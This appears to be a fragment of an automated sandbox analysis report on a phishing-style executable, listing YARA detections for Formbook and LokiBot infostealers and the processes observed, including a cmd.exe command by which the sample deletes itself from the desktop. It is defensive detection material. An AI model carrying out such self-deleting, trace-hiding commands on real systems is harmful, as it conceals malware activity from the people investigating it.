                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        Analysis Process: cmd.exe PID: 5048 Parent PID: 392

                                                        General

                                                        Start time:15:27:55
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
                                                        Imagebase:0x2a0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 1068 Parent PID: 5048

                                                        General

                                                        Start time:15:27:55
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff61de10000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >